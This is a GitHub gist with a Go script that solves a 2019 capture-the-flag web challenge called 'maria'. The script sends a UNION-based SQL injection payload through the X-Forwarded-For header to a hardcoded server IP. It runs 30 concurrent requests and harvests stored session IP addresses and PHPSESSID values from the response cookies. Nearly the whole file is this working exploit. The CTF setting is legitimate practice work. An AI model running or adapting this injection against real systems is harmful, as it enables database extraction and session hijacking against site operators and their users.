Last active
February 18, 2019 03:33
-
-
Save chtzvt/a632abeba3648a43de85ed47322cd6b8 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// https://cybertalents.com/competitions/quals-saudi-oman-national-cyber-security-ctf-2019/maria/ | |
// 🂁 ctrezevant@sdf ~ $ time go run ctf.go | |
// go run ctf.go 1.17s user 0.45s system 48% cpu 3.341 total | |
package main | |
import ( | |
"fmt" | |
"math/rand" | |
"net/http" | |
"regexp" | |
"sync" | |
"time" | |
) | |
func main() { | |
url := "http://35.222.174.178/maria/" | |
payload := "kfdad' or id = '6969' union select 'test',1,2,(select ip_address from nxf8_sessions WHERE id=%d) from nxf8_sessions--" | |
wg := &sync.WaitGroup{} | |
for i := 0; i < 30; i++ { | |
go (func(wg *sync.WaitGroup, url, payload *string, offset int) { | |
wg.Add(1) | |
time.Sleep(time.Duration(rand.Intn(3) + 3) * time.Microsecond) | |
sendPayload(url, payload, offset) | |
wg.Done() | |
})(wg, &url, &payload, i) | |
} | |
wg.Wait() | |
} | |
func sendPayload(url, query *string, offset int) { | |
client := &http.Client{} | |
req, err := http.NewRequest("GET", *url, nil) | |
if err != nil { | |
fmt.Print("sendPayload: " + err.Error()) | |
return | |
} | |
req.Header.Add("X-Forwarded-For", fmt.Sprintf(*query, offset)) | |
res, err := client.Do(req) | |
if err != nil { | |
fmt.Print("sendPayload: " + err.Error()) | |
return | |
} | |
if res == nil || res.StatusCode != 200 { | |
fmt.Printf("sendPayload: response is nil or != 200 for offset %d", offset) | |
return | |
} | |
isIP := regexp.MustCompile(`^[^a-zA-Z]+$`).MatchString | |
var ipAddr string | |
var sessionID string | |
for _, cookie := range res.Cookies() { | |
if isIP(cookie.Value) && cookie.Name == "PHPSESSID" { | |
ipAddr = cookie.Value | |
} | |
if !isIP(cookie.Value) && cookie.Value != "deleted" && cookie.Name == "PHPSESSID" { | |
sessionID = cookie.Value | |
} | |
} | |
if ipAddr != "" && sessionID != "" { | |
fmt.Printf("[ID: %d IP: %s SESSID: %s]\n", offset, ipAddr, sessionID) | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment